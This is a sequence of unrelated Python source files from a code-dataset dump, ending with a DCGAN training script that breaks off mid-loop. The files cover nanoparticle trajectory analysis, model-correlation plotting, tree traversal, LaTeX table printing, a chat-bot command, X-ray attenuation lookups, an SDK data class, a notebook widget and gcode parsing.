        """Per-frame shift of the nanoparticle COM from its time mean."""
        return self.split_arr_dict['APT_COR'] - self.mean_nanop_com
class OdaAnalysis(WrapData):
    """
    Analyse ODA/ODN behaviour around the nanoparticle.

    Inherits from `WrapData` and provides methods to analyse ODN data:
    radial distributions around the nanoparticle COM and helpers to
    shift residue coordinates into the NP frame.

    (The original docstring described a `PlotOdnAnalysis` class; this
    class only computes -- plotting lives elsewhere.)

    Methods:
        distribution_around_avg_np(com_aligned_residues, mean_nanop_com,
        delta_r, orginated=False, max_radius=None) -> tuple:
            Radial distribution of residues around the NP average COM.
        shift_residues_from_np(residues, np_displacement) -> np.ndarray:
            Undo the per-frame NP displacement for every residue.
    """
    def __init__(self,
                 log: logger.logging.Logger
                 ) -> None:
        super().__init__()
        # The last two rows of the AMINO_ODN block are dropped --
        # presumably trailing bookkeeping rows; TODO confirm in GetData.
        self.amino_arr: np.ndarray = self.split_arr_dict['AMINO_ODN'][:-2]
        self.np_arr: np.ndarray = self.split_arr_dict['APT_COR']
        self.initiate(log)
    def initiate(self,
                 log: logger.logging.Logger
                 ) -> None:
        """
        Initiate the analysis of ODA behaviour.
        """
        self.prepare_data(log)
        # Shift data toward the average COM of the NP
        # adjusted_oda: np.ndarray = \
        #     self.shift_residues_from_np(self.amino_arr,
        #                                 self.nanoparticle_disp_from_avg_com)
        # radii, molecule_counts, _, g_r = \
        #     self.distribution_around_avg_np(
        #         adjusted_oda, self.mean_nanop_com, 1, orginated=True)
    def prepare_data(self,
                     log: logger.logging.Logger
                     ) -> None:
        """
        1- Set NP center of mass at origin at each time frame
        2- Shift AMINO group accordingly
        3- Apply PBC to the AMINO group
        NOTE(review): the shifted array is computed but neither stored
        nor returned, and the PBC step (3) is not implemented yet.
        """
        amino_c: np.ndarray = self.amino_arr
        np_c: np.ndarray = self.np_arr
        shifted_amino: np.ndarray = self.com_to_zero(amino_c, np_c)
    def com_to_zero(self,
                    amino: np.ndarray,
                    np_arr: np.ndarray
                    ) -> np.ndarray:
        """Subtract the NP COM from all the AMINO groups.

        Rows of ``amino`` are frames; columns are flattened xyz
        triplets, so columns j, j+3, j+6, ... hold coordinate j.
        """
        shifted_aminos: np.ndarray = np.empty_like(amino)
        for i in range(amino.shape[0]):
            for j in range(3):
                shifted_aminos[i, j::3] = amino[i, j::3] - np_arr[i, j]
        return shifted_aminos
    @staticmethod
    def distribution_around_avg_np(com_aligned_residues: np.ndarray,
                                   mean_nanop_com: np.ndarray,
                                   delta_r: float,
                                   orginated: bool = False,
                                   max_radius: typing.Union[float, None] = None
                                   ) -> tuple:
        """
        Calculate the distribution of ODN molecules around the
        nanoparticle's average COM.
        Parameters:
        - com_aligned_residues: Residues whose coordinates are relative
          to the nanoparticle's COM for each frame.
        - mean_nanop_com: Average COM of the nanoparticle over all frames.
        - delta_r: Width of each annulus (radial bin).
        - orginated: When True, the data are first re-centred on the
          origin by subtracting ``mean_nanop_com`` from every residue.
        - max_radius: Maximum distance to consider. If None, it is taken
          from the data.
        Returns:
        - bin_centers: radii corresponding to each annulus.
        - all_counts: raw histogram from np.histogram.
        - counts: summed counts (see NOTE below).
        - g_r: radial distribution estimate.
        """
        if not orginated:
            distances = OdaAnalysis._get_adjusted_distance(
                com_aligned_residues, mean_nanop_com)
        else:
            # Reshaping mean_np_com to broadcast-compatible with adjusted_res
            mean_nanop_com_reshaped = \
                mean_nanop_com[np.newaxis, :].repeat(
                    com_aligned_residues.shape[1]//3, axis=0).reshape(1, -1)
            # Subtracting mean_np_com from every frame of com_aligned_residues
            origin_aligned_residues = \
                com_aligned_residues - mean_nanop_com_reshaped
            distances = \
                OdaAnalysis._get_orginated_distance(origin_aligned_residues)
        # Determine max radius if not given
        if max_radius is None:
            max_radius = np.max(distances)
            print(max_radius)
        # Create bins based on delta_r
        bins = np.arange(0, max_radius + delta_r, delta_r)
        # NOTE(review): np.histogram flattens its input, so ``all_counts``
        # is already a 1-D per-bin array; np.sum(..., axis=0) therefore
        # collapses it to a single scalar -- confirm that is intended.
        all_counts, _ = np.histogram(distances, bins=bins)
        counts = np.sum(all_counts, axis=0)
        # Return bin centers (i.e., actual radii) and counts
        bin_centers = (bins[:-1] + bins[1:]) / 2
        # Calculate the volume of each shell
        shell_volumes = 4/3 * np.pi * (bins[1:]**3 - bins[:-1]**3)
        # RDF Calculation
        # Assuming the number of particles in the system is constant over time
        # NOTE(review): len(distances) is the size of the FIRST axis
        # (frames), not the particle count -- confirm.
        bulk_density = len(distances) / (4/3 * np.pi * max_radius**3)
        g_r = counts / (shell_volumes * bulk_density)
        return bin_centers, all_counts, counts, g_r
    @staticmethod
    def _get_adjusted_distance(com_aligned_residues: np.ndarray,
                               mean_nanop_com: np.ndarray
                               ) -> np.ndarray:
        """
        Distance of every residue from the NP when the NP COM is NOT at
        the origin: subtract ``mean_nanop_com`` per residue, then take
        the Euclidean norm over the xyz axis.
        """
        # Calculate squared distances from each ODN to the mean_nanop_com
        distances_squared = np.sum(
            (com_aligned_residues.reshape(
                -1,
                com_aligned_residues.shape[1]//3, 3) - mean_nanop_com) ** 2,
            axis=2)
        # Get actual distances
        return np.sqrt(distances_squared)
    @staticmethod
    def _get_orginated_distance(origin_aligned_residues: np.ndarray,
                                ) -> np.ndarray:
        """
        Distance of every residue from the origin, for data already
        centred on [0, 0, 0].
        """
        distances_squared = np.sum(origin_aligned_residues.reshape(
            -1, origin_aligned_residues.shape[1]//3, 3) ** 2, axis=2)
        return np.sqrt(distances_squared)
    @staticmethod
    def shift_residues_from_np(residues: np.ndarray,
                               np_displacement: np.ndarray
                               ) -> np.ndarray:
        """
        Shift residue coordinates by the per-frame displacement of the
        NP from its average COM, i.e. undo the NP drift frame by frame.
        """
        # Determine the number of residues
        num_residues: int = residues.shape[1] // 3
        # Reshape the displacement data
        displacement_reshaped: np.ndarray = np_displacement[:, np.newaxis, :]
        # Tile the reshaped data to match the residues shape and reshape
        displacement_tiled: np.ndarray = \
            np.tile(displacement_reshaped,
                    (1, num_residues, 1)).reshape(residues.shape)
        # Subtract
        return residues - displacement_tiled
# Script entry point: run the ODA analysis with a dedicated log file.
if __name__ == "__main__":
    OdaAnalysis(log=logger.setup_logger('oda_analysis.log'))
| saeed-amiri/analysing-legacy | codes/oda_analysing.py | oda_analysing.py | py | 8,871 | python | en | code | 0 | github-code | 13 |
27876443135 | import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from src import meta
from fnmatch import fnmatch
import argparse
import os
def main():
    """Load cached validation predictions for every model, compute their
    pairwise correlation on the chosen label, and show a clustermap.

    Command-line flags:
      --label    prediction column to correlate (default 'toxic')
      --method   correlation method passed to DataFrame.corr
      --exclude  extra glob patterns of model names to skip (repeatable)
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--label', default='toxic')
    parser.add_argument('--method', default='spearman')
    parser.add_argument('--exclude', action='append')
    args = parser.parse_args()

    # Glob-style patterns of model names to skip; test models always are.
    exclusions = ['test_*', ]
    if args.exclude is not None:
        exclusions += args.exclude

    df = None
    for model_name in os.listdir('cache'):
        if model_name == 'features':
            continue
        if any(fnmatch(model_name, ex) for ex in exclusions):
            continue
        try:
            # Concatenate the per-fold validation predictions of this model.
            model_preds = pd.concat(meta.get_model_prediction(model_name, fi, 'val') for fi in range(meta.cv.n_splits))
            if df is None:
                df = pd.DataFrame(index=model_preds.index)
            df[model_name] = model_preds[args.label]
        except Exception as err:
            # Narrowed from a bare ``except:`` (which also swallowed
            # KeyboardInterrupt/SystemExit) and now reports the cause.
            print("Error loading predictions for %r: %s" % (model_name, err))

    if df is None:
        # Nothing loaded: corr()/clustermap would crash on None.
        print("No model predictions could be loaded from 'cache'.")
        return

    print("Computing correlations for %r..." % list(df.columns))
    corr = df.corr(method=args.method)
    sns.clustermap(data=corr, metric='correlation')
    plt.show()
# Script entry point: build and display the correlation clustermap.
if __name__ == "__main__":
    main()
| alno/kaggle-jigsaw-toxic-comment-classification-challenge | src/tools/corrplot.py | corrplot.py | py | 1,290 | python | en | code | 4 | github-code | 13 |
2845727012 | nodes_str = '''
1
/ \\
2 3
/ \\
4 5
/ \\
6 7
'''
print(nodes_str)
# Build the tree from the ASCII diagram above as nested dicts:
# each node is {"data": value} plus optional "left"/"right" children.
nodes = { "data" : 1 }
nodes['left'] = { "data" : 2 }
nodes['right'] = { "data" : 3 }
nodes['left']['left'] = { "data" : 4 }
nodes['left']['right'] = { "data" : 5 }
nodes['left']['left']['left'] = { "data" : 6 }  # 6 hangs under 4 (left branch)
nodes['left']['right']['right'] = { "data" : 7 }  # 7 hangs under 5 (right branch)
print(nodes)
q = []  # FIFO queue for the breadth-first walk: enqueue at index 0, pop at end
n = []  # accumulator for the visit order
q.insert(0,nodes)  # seed the queue with the root
def traverse():
    """Breadth-first traversal of the global tree ``nodes``.

    Pops nodes from the tail of the global queue ``q`` (children are
    enqueued at the head), printing each value and appending it to the
    global list ``n``.  The original re-counted the queue length by
    hand after every iteration and carried a dead ``#break`` plus a
    bare ``return``; looping while the queue is non-empty is
    equivalent and simpler.
    """
    while q:
        node = q.pop()
        print(node['data'])
        n.append(node['data'])
        if 'left' in node:
            q.insert(0, node['left'])
        if 'right' in node:
            q.insert(0, node['right'])
traverse()
print(n) | melezhik/sparrow-plugins | ds-binary-tree-bft2/tasks/python/task.py | task.py | py | 711 | python | tr | code | 2 | github-code | 13 |
#----------------------------------------------------------
# FUNCTION PrintTabLatex()
#
# Prints a table in LaTeX format, to ease transferring data
# into the report.
#-----------------------------------------------------------
def PrintTabLatex(aTitulos, aDatos):
    """Print a LaTeX table to stdout.

    aTitulos -- list of column header strings
    aDatos   -- list of rows, each a list of cell strings

    Bug fixed: the column specifier used to grow by one 'c|' per DATA
    ROW (len(aDatos)); a table needs one centred column per TITLE.
    """
    cIni = "\\hline "
    cFin = " \\\\"
    # One centred column per header, separated by vertical rules.
    cCPypeC = "|" + "c|" * len(aTitulos)
    # Header row and data rows share the same "\hline a & b \\" shape.
    cTit = cIni + " & ".join(aTitulos) + cFin
    aTab = [cIni + " & ".join(aFila) + cFin for aFila in aDatos]
    print("\\begin{table}[H]")
    print(" \\makegapedcells")
    print(" \\centering")
    print("\\resizebox{0.7\\textwidth}{!}{")
    print(" \\begin{tabular}{" + cCPypeC + "}")
    print(cTit)
    for cLin in aTab:
        print(cLin)
    print(" \\hline")
    print(" \\end{tabular}}")
    print("\\end{table}")
| fmonpelat/Analisis-Numerico---TP2 | python scripts/PrintTabLatex.py | PrintTabLatex.py | py | 1,280 | python | pt | code | 0 | github-code | 13 |
22720200123 | """Commands: "!total [emote]", "!minute [emote]"."""
from bot.commands.abstract.command import Command
from bot.utilities.permission import Permission
from bot.utilities.tools import replace_vars
class OutputStats(Command):
    """Reply with total emote stats ('!total <emote>' / '!tkp') or
    per-minute stats ('!minute <emote>' / '!kpm')."""

    perm = Permission.User

    def __init__(self, _):
        """Initialize variables; responses are (re)loaded on each run."""
        self.responses = {}

    def match(self, bot, user, msg, tag_info):
        """Match '!total <emote>', '!minute <emote>', '!kpm' or '!tkp'."""
        cmd = msg.strip().lower()
        if cmd.startswith("!total ") or cmd.startswith("!minute "):
            # Emote names are case-sensitive, so split the raw message.
            return self._second_word(msg).strip() in bot.emotes.get_emotes()
        return cmd in ("!kpm", "!tkp")

    def run(self, bot, user, msg, tag_info):
        """Write the requested emote statistic to chat."""
        self.responses = bot.config.responses["outputStats"]
        cmd = msg.strip().lower()
        # Map each command form to (emote, per_minute?); the original
        # repeated the count/response lookup in four identical branches.
        if cmd.startswith("!total "):
            emote, per_minute = self._second_word(msg), False
        elif cmd.startswith("!minute "):
            emote, per_minute = self._second_word(msg), True
        elif cmd == "!tkp":
            emote, per_minute = "Kappa", False
        elif cmd == "!kpm":
            emote, per_minute = "Kappa", True
        else:
            return
        if per_minute:
            count = bot.ecount.get_minute_count(emote)
            response = self.responses["minute_reply"]["msg"]
        else:
            count = bot.ecount.get_total_count(emote)
            response = self.responses["total_reply"]["msg"]
        var = {"<EMOTE>": emote, "<AMOUNT>": count}
        bot.write(replace_vars(response, var))

    @staticmethod
    def _second_word(msg):
        """Returns second word (after !command usually)."""
        cmd = msg.strip().split(" ", 1)
        return cmd[1]
| NMisko/monkalot | bot/commands/outputstats.py | outputstats.py | py | 2,111 | python | en | code | 17 | github-code | 13 |
42488286511 | import numpy as np
import matplotlib.pyplot as plt
import NIST_mass_attenuation_data as NIST
import importlib
importlib.reload(NIST)
#class MassAttenData:
COL_MU = 1
COL_MUEN = 2
def log_spaced_array(start, end, points):
    """Return ``points`` values spaced evenly on a log scale from
    ``start`` to ``end`` (inclusive).

    Bug fixed: the original raised np.logspace's output to the 10th
    power, but logspace already returns 10**x, so the array actually
    spanned start**10 .. end**10 instead of start .. end.
    """
    return np.logspace(np.log10(start), np.log10(end), points)
def log_interp(x, xp, yp):
    """Piecewise-linear interpolation in log-log space: interpolates
    log10(yp) against log10(xp) at log10(x), then maps back through
    10**(.) -- appropriate for attenuation data spanning decades."""
    return np.power(10.0, np.interp(np.log10(x), np.log10(xp), np.log10(yp)))
def get_list_of_elements():
    """Print a human-readable list of the elements in the NIST table.

    Assumes NIST.data["z"] maps both the element symbol and the full
    name (lowercase) to the same atomic number, with symbol/name pairs
    adjacent in insertion order -- TODO confirm in the data module.
    """
    Z_list = list(zip(NIST.data["z"].values(), NIST.data["z"]))
    Z_list_str = "List of elements included in data: \n"
    Z_list_str += "----------------------------------\n"
    # Step by 2: entry i is the full name, entry i-1 its symbol.
    for i in range(1,len(Z_list), 2):
        Z_list_str += str(Z_list[i][0]) + ": " + Z_list[i][1].capitalize() + " (" + Z_list[i-1][1] + ")\n"
    print(Z_list_str)
def get_Z_idx(Z):
    """Resolve an element selector to an atomic number.

    Z -- either an int (returned unchanged) or a symbol/name string
    looked up case-insensitively in the NIST data table.

    Raises ValueError for an unknown element string and TypeError for
    any other argument type.
    """
    if type(Z) is str:
        try:
            Z_idx = NIST.data["z"][Z.lower()]
        except KeyError:
            # Narrowed from a bare ``except:`` so unrelated errors
            # (KeyboardInterrupt etc.) are no longer swallowed.
            raise ValueError("Element " + Z + " not found in database.")
    elif type(Z) is int:
        Z_idx = Z
    else:
        raise TypeError("Only ints and strings allowed for element selection.")
    return Z_idx
def interp_data(E, Z, col):
    """Log-log interpolate column ``col`` of element Z's NIST table at
    energies E (MeV)."""
    Z_idx = get_Z_idx(Z)
    mu_data = NIST.data[Z_idx]["data"]
    E_data = mu_data[:,0]  # column 0: photon energy (MeV)
    y_data = mu_data[:,col]
    return log_interp(E, E_data, y_data)
def get_mu_rho(E, Z):
    """Mass attenuation coefficient mu/rho (cm^2/g) at energy E."""
    return interp_data(E,Z,COL_MU)
def get_muen_rho(E, Z):
    """Mass energy-absorption coefficient mu_en/rho (cm^2/g) at E."""
    return interp_data(E,Z,COL_MUEN)
def get_mu(E, Z):
    """Linear attenuation coefficient mu (1/cm): mu/rho times density."""
    rho = NIST.data[get_Z_idx(Z)]["density"]
    return interp_data(E,Z,COL_MU) * rho
def get_muen(E, Z):
    """Linear energy-absorption coefficient mu_en (1/cm)."""
    rho = NIST.data[get_Z_idx(Z)]["density"]
    return interp_data(E,Z,COL_MUEN) * rho
def plot_spectrum(Z_list, same_plot=False):
    """Plot mu/rho and mu_en/rho versus photon energy (log-log scales).

    Z_list -- a single element selector or a list of them (int Z, or
    symbol/name string).  NOTE(review): ``same_plot`` is accepted but
    never used; every element gets its own figure.
    """
    if type(Z_list) is not list:
        Z_list = [Z_list]  # allow a bare element selector
    for Z in Z_list:
        Z_idx = get_Z_idx(Z)
        data = NIST.data[Z_idx]["data"]
        E = data[:,0]  # photon energy (MeV)
        mu = data[:,1]  # mass attenuation coefficient
        muen = data[:,2]  # mass energy-absorption coefficient
        plt.figure()
        plt.plot(E, mu, '-')
        plt.plot(E, muen, '--')
        plt.title(NIST.data[Z_idx]["name"])
        plt.xlabel("E (MeV)")
        plt.ylabel(r'$\mu/\rho \ or \ \mu_{en}/\rho \ (cm^2g^{-1})$')
        plt.legend([r'$\mu/\rho$', r'$\mu_{en}/\rho$'])
        plt.yscale('log')
        plt.xscale('log')
        plt.show()
| agreenswardellipse/FAFA05_gamma_spectroscopy | NIST_mass_attenuation.py | NIST_mass_attenuation.py | py | 2,119 | python | en | code | 2 | github-code | 13 |
17052789854 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class IndirectQualificationInfo(object):
    """Qualification info for an indirect merchant: a list of proof
    images plus an MCC (merchant category) code.

    Follows the Alipay SDK conventions: private attributes behind
    properties, plus dict <-> object converters.
    """

    def __init__(self):
        self._image_list = None
        self._mcc_code = None

    @property
    def image_list(self):
        return self._image_list

    @image_list.setter
    def image_list(self, value):
        # Only list values are accepted; a shallow copy is stored.
        if isinstance(value, list):
            self._image_list = [item for item in value]

    @property
    def mcc_code(self):
        return self._mcc_code

    @mcc_code.setter
    def mcc_code(self, value):
        self._mcc_code = value

    def to_alipay_dict(self):
        """Serialize to a plain dict, recursively converting any value
        that itself supports ``to_alipay_dict``.  Falsy fields (None,
        empty list, empty string) are omitted, matching the SDK."""
        params = dict()
        if self.image_list:
            if isinstance(self.image_list, list):
                self.image_list = [
                    item.to_alipay_dict() if hasattr(item, 'to_alipay_dict') else item
                    for item in self.image_list
                ]
            if hasattr(self.image_list, 'to_alipay_dict'):
                params['image_list'] = self.image_list.to_alipay_dict()
            else:
                params['image_list'] = self.image_list
        if self.mcc_code:
            if hasattr(self.mcc_code, 'to_alipay_dict'):
                params['mcc_code'] = self.mcc_code.to_alipay_dict()
            else:
                params['mcc_code'] = self.mcc_code
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build an instance from a response dict; None/empty gives None."""
        if not d:
            return None
        o = IndirectQualificationInfo()
        o.image_list = d.get('image_list')
        o.mcc_code = d.get('mcc_code')
        return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/IndirectQualificationInfo.py | IndirectQualificationInfo.py | py | 1,773 | python | en | code | 241 | github-code | 13 |
17945288810 | import ipywidgets as widgets
import json
from IPython.display import display
from .sampling import Sampling
from .filters import Filters
from .columns import Columns
class Downloader:
    """Jupyter widget bundle for configuring a dataset download.

    Combines a column picker, a filter editor and a sampling-ratio
    control into one VBox, and mirrors the assembled download spec into
    ``self.value`` whenever any sub-widget changes.
    """
    def __init__(
        self,
        name=None,
        catalog_item=None,
        display_value=False,
        display_widget=False,
    ):
        # NOTE(review): ``name`` is accepted but never used -- confirm
        # whether callers still pass it.
        self.catalog_item = catalog_item
        # Sub-widgets are created hidden; only the container is shown.
        self.columns = Columns(
            spec=self.catalog_item['spec'],
            display_widget=False
        )
        self.filters = Filters(
            spec=self.catalog_item['spec'],
            display_widget=False
        )
        self.sample_ratio = Sampling(display_widget=False)
        # Holds the combined spec so other widgets can observe it.
        self.value = widgets.ValueWidget()
        # self.download_button = widgets.Button(
        #     description="Download",
        #     icon='plus'
        # )
        # self.generator = widgets.interactive_output(generate_cell, {})
        # def on_button_clicked(b):
        #     with self.generator:
        #         get_ipython().set_next_input(f'spec = 1')#{self.spec}')
        #     pass
        # self.download_button.on_click(on_button_clicked)
        self.widgets = [
            self.columns.widget_container,
            self.filters.widget_container,
            self.sample_ratio.widget_container,
            # self.download_button,
            # self.generator,
        ]
        def update_output(*args):
            # Re-assemble the spec whenever any sub-widget changes.
            self.value.value = self.spec
        update_output()
        self.columns.value.observe(update_output, 'value')
        self.filters.value.observe(update_output, 'value')
        self.sample_ratio.value.observe(update_output, 'value')
        if display_value:
            # NOTE(review): this inner function shadows the
            # ``display_value`` flag argument -- rename candidate.
            def display_value(spec):
                download_spec = json.dumps(
                    {
                        'id': catalog_item['id'],
                        'executor_type': catalog_item['executor_type'],
                        'spec': spec
                    },
                    indent=4
                )
                print(
                    'to get date copy to next cell:\n\n'
                    f"""df = lakey.download({download_spec})"""
                )
            self.output = widgets.interactive_output(
                display_value,
                {'spec': self.value}
            )
            self.widgets.append(self.output)
        self.widget_container = widgets.VBox(
            self.widgets
        )
        if display_widget:
            display(self.widget_container)
    @property
    def spec(self):
        """Download spec assembled from the three sub-widgets."""
        return {
            'columns': self.columns.selected_columns,
            'filters': self.filters.filters,
            'randomize_ratio': self.sample_ratio.sampling_ratio
        }
| cosphere-org/lakey-ui | lakey_ui/lakey/widgets/downloader.py | downloader.py | py | 2,740 | python | en | code | 1 | github-code | 13 |
71595944339 | import re #standard library providing regular expression facilities
import math #standard library providing mathematical operations
def move(joint, client):
    '''Send the joint angles in ``joint`` (a sequence whose first item
    holds axes A1..A6) to the robot controller as a KRL axis string,
    e.g. "{A1 0, A2 90, ...}".'''
    axes = list(joint)[0]
    parts = ['A%d %s' % (index + 1, axes[index]) for index in range(6)]
    client.write('MYAXIS', '{' + ', '.join(parts) + '}')
def extruder_online(client, arg):
    '''Switch the extruder output on the live robot controller.

    arg must be 'START' or 'STOP' (mapped to the I/O values 'True' /
    'False'); anything else prints a usage hint.'''
    states = {'START': 'True', 'STOP': 'False'}
    if arg in states:
        client.write('$OUT[16]', states[arg])
    else:
        print('The input of extruder() has to be either START or STOP')
def extruder_offline(robot, arg):
    '''Offline twin of extruder_online(): drives the simulated robot's
    digital output via setDO instead of the live client connection.'''
    states = {'START': 'True', 'STOP': 'False'}
    if arg in states:
        robot.setDO('$OUT[16]', states[arg])
    else:
        print('The input of extruder() has to be either START or STOP')
def parser(filename):
    '''Parse a gcode file into [X, Y, layer, extruding] waypoints.

    Returns a list of [float X, float Y, int layer, True] entries, one
    per G1 move that carries both an X and a Y coordinate.  ``layer``
    counts "LAYER:" markers seen so far (Cura-style comments).
    '''
    parsed_file = list()  # accumulated waypoints
    layer = 0  # current layer index, i.e. height of the print
    with open(filename) as gcode:
        for line in gcode:
            line = line.strip()  # drop surrounding whitespace/newline
            if re.findall("LAYER:", line):  # new layer marker -> bump z index
                layer += 1
                continue  # a LAYER line carries no coordinates
            # NOTE(review): findall matches "G1" ANYWHERE in the line
            # (including comments), not only at the start -- confirm.
            if re.findall("G1", line):
                # NOTE(review): this pattern requires a decimal point, so
                # integer coordinates like "X10" are silently skipped.
                coord = re.findall(r'[XY].?\d+.\d+', line)
                if len(coord) == 2:  # only keep moves with both X and Y
                    X = re.findall('\d*\.?\d+', coord[0])[0]  # numeric part of X token
                    Y = re.findall('\d*\.?\d+', coord[1])[0]  # numeric part of Y token
                    parsed_file.append([float(X), float(Y), layer, True])  # extruding flag always True here
    return parsed_file
def interpolate(path, detail):
    '''Insert intermediate waypoints IN PLACE so consecutive points are
    at most ``detail`` apart, giving the end-effector a smoother, more
    linear velocity profile.  (Currently unused.)'''
    extra = 0  # how many points have been inserted so far; keeps indices aligned
    for i in range(len(path)-1):  # walk the original consecutive pairs
        # How many extra points fit between this pair at spacing ``detail``.
        number_of_cuts = int(distance(path[i+extra], path[i+extra+1])//detail)
        if number_of_cuts > 0:  # only subdivide when the gap exceeds ``detail``
            # Per-step x/y increments that split the segment into equal parts.
            dist_x, dist_y = distance_x_y(
                path[i+extra], path[i+extra+1], number_of_cuts+1)
            for k in range(number_of_cuts):  # insert each intermediate point
                item = list()  # fresh waypoint [x, y, layer, extruding]
                item.append((k+1)*dist_x + path[i+extra][0])  # interpolated x
                item.append((k+1)*dist_y + path[i+extra][1])  # interpolated y
                item.append(path[i+extra][2])  # copy the layer index
                item.append(path[i+extra][3])  # copy the extruding flag
                path.insert(i+k+extra+1, item)  # insert after the segment start
            extra += number_of_cuts  # account for the inserted points
def distance(point1, point2):
    '''Euclidean distance between two 2-D points (index 0 = x, 1 = y).'''
    dx = point1[0] - point2[0]
    dy = point1[1] - point2[1]
    return math.sqrt(dx ** 2 + dy ** 2)
def distance_x_y(point1, point2, number_of_cuts):
    '''Per-step x and y increments that split the segment from point1
    to point2 into ``number_of_cuts`` equal parts.'''
    step_x = (point2[0] - point1[0]) / number_of_cuts
    step_y = (point2[1] - point1[1]) / number_of_cuts
    return step_x, step_y
| malek-luky/Industrial-Robotics | 3D Printing/62607_FinalReport_Team4/functions.py | functions.py | py | 5,429 | python | en | code | 0 | github-code | 13 |
32025138671 | '''Deep Convolutional Generative Adverserail Netowrks'''
# Import libraries
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim as optimizer
import torch.utils.data
from torch.autograd import Variable
import torchvision.datasets as datasets
import torchvision.utils as tvutils
import torchvision.transforms as tvtransforms
import os
# Make sure Pytorch uses GPU (requires a CUDA-capable device).
device = torch.device('cuda')
dtype = torch.cuda.FloatTensor
# Hyperparameters
BATCH_SIZE = 64
IMAGE_SIZE = 64 # set the size of each generated image to (64, 64)
N_EPOCHS = 10
# Transformations: resize, convert to tensor, then map pixels to [-1, 1]
# to match the generator's Tanh output range.
# NOTE(review): transforms.Scale was deprecated and later removed from
# torchvision in favour of Resize -- confirm the installed version.
transforms = tvtransforms.Compose([
    tvtransforms.Scale(IMAGE_SIZE),
    tvtransforms.ToTensor(),
    tvtransforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])
# Load dataset
# a. Download dataset to the './data' folder
# b. Apply the transformations specified above
print('[INFO] Loading dataset')
dataset = datasets.CIFAR10(root='data', download=True, transform=transforms)
# c. Serve the dataset batch by batch, shuffled each epoch.
data_loader = torch.utils.data.DataLoader(dataset, batch_size=BATCH_SIZE,
                                          shuffle=True)
# Initialize weights
def init_weights(neural_net):
    '''
    Initialize a layer's weights, DCGAN-style.

    Conv/ConvTranspose layers get weights drawn from N(0, 0.02);
    BatchNorm layers get weights from N(1.0, 0.02) and zero biases.
    (The original docstring claimed "uniform initialization", but
    ``normal_()`` is what the code -- and the DCGAN paper -- use.)

    Arguments:
        * neural_net: the module to initialize; typically applied to
          every submodule via ``model.apply(init_weights)``
    '''
    # Dispatch on the class name, as in the reference DCGAN implementation.
    class_name = neural_net.__class__.__name__
    if class_name.find('Conv') != -1:
        neural_net.weight.data.normal_(0.0, 0.02)  # ...normal_(mean, std)
    elif class_name.find('BatchNorm') != -1:
        neural_net.weight.data.normal_(1.0, 0.02)
        # Fill the biases with 0
        neural_net.bias.data.fill_(0)
# Creating the Generator class
class Generator(nn.Module):
    '''DCGAN generator: maps a 100-d noise vector to a 64x64 RGB image.'''
    def __init__(self):
        '''Generator architecture: stacked transposed convolutions that
        upsample the 1x1 noise input to 4 -> 8 -> 16 -> 32 -> 64 pixels.'''
        super(Generator, self).__init__()
        self.gen_model = nn.Sequential(
            nn.ConvTranspose2d(100, 512, 4, 1, 0, bias=False), # 100 => size of input vector noise
            nn.BatchNorm2d(512),
            nn.ReLU(True),
            nn.ConvTranspose2d(512, 256, 4, 2, 1, bias=False),
            nn.BatchNorm2d(256),
            nn.ReLU(True),
            nn.ConvTranspose2d(256, 128, 4, 2, 1, bias=False),
            nn.BatchNorm2d(128),
            nn.ReLU(True),
            nn.ConvTranspose2d(128, 64, 4, 2, 1, bias=False),
            nn.BatchNorm2d(64),
            nn.ReLU(True),
            nn.ConvTranspose2d(64, 3, 4, 2, 1, bias=False), # out_channels = 3 (RGB)
            nn.Tanh()  # squash output to [-1, 1], matching Normalize(0.5, 0.5)
        )
        self.gen_model.cuda()  # NOTE: requires a CUDA device
    def forward(self, input_noise):
        '''
        Forward propagate the signal through the Generator.
        Arguments:
            * input_noise: noise tensor of shape (batch, 100, 1, 1)
        Returns:
            * output: a batch of fake (generated) images
        '''
        output = self.gen_model(input_noise)
        return output
# Instantiate the Generator and apply DCGAN weight initialization.
print('[INFO] Creating Generator')
generator = Generator()
generator.apply(init_weights) # Initializing Gen weights
# Creating the Discriminator class
class Discriminator(nn.Module):
    '''DCGAN discriminator: classifies 64x64 RGB images as real or fake.'''
    def __init__(self):
        '''Discriminator architecture: strided convolutions downsampling
        64 -> 32 -> 16 -> 8 -> 4 -> 1, ending in a sigmoid probability.'''
        # Initializing the Module class
        super(Discriminator, self).__init__()
        self.disc_model = nn.Sequential(
            nn.Conv2d(3, 64, 4, 2, 1, bias=False),
            nn.LeakyReLU(0.02, True),
            nn.Conv2d(64, 128, 4, 2, 1, bias=False),
            nn.BatchNorm2d(128),
            nn.LeakyReLU(0.2, True),
            nn.Conv2d(128, 256, 4, 2, 1, bias=False),
            nn.BatchNorm2d(256),
            nn.LeakyReLU(0.2, True),
            nn.Conv2d(256, 512, 4, 2, 1, bias=False),
            nn.BatchNorm2d(512),
            nn.LeakyReLU(0.2, True),
            nn.Conv2d(512, 1, 4, 1, 0, bias=False), # output = 1 channel (real/fake score)
            nn.Sigmoid()
        )
        self.disc_model.cuda()  # NOTE: requires a CUDA device
    def forward(self, input_image):
        '''
        Forward propagate the signal through the Discriminator.
        Arguments:
            * input_image: batch of images (real or generated)
        Returns:
            * output: per-image probability of being real, as a 1-D vector
        '''
        output = self.disc_model(input_image)
        return output.view(-1) # flatten the output of the convolution
# Creating the Discriminator and initializing its weights
print('[INFO] Creating Discriminator')
discriminator = Discriminator()
discriminator.apply(init_weights)
# Training DCGAN:
# a. Train the Discriminator on real images
# b. Train the Discriminator on fake (generated) images
# Loss function: binary cross-entropy over the real/fake labels.
criterion = nn.BCELoss()
# Generator optimizer (lr/betas per the DCGAN paper)
gen_opt = optimizer.Adam(generator.parameters(), lr=0.0002, betas=(0.5, 0.999))
# Discriminator optimizer
disc_opt = optimizer.Adam(discriminator.parameters(), lr=0.0002, betas=(0.5, 0.999))
# Create the output directories for saved image grids if missing.
dirs = ['results', 'results/real', 'results/fake']
for directory in dirs:
    if not os.path.exists(directory):
        os.mkdir(directory)
# Main adversarial training loop.
# NOTE(review): range(N_EPOCHS+1) runs 11 epochs for N_EPOCHS=10 --
# confirm whether the extra epoch is intentional.
print('[INFO] Started training...')
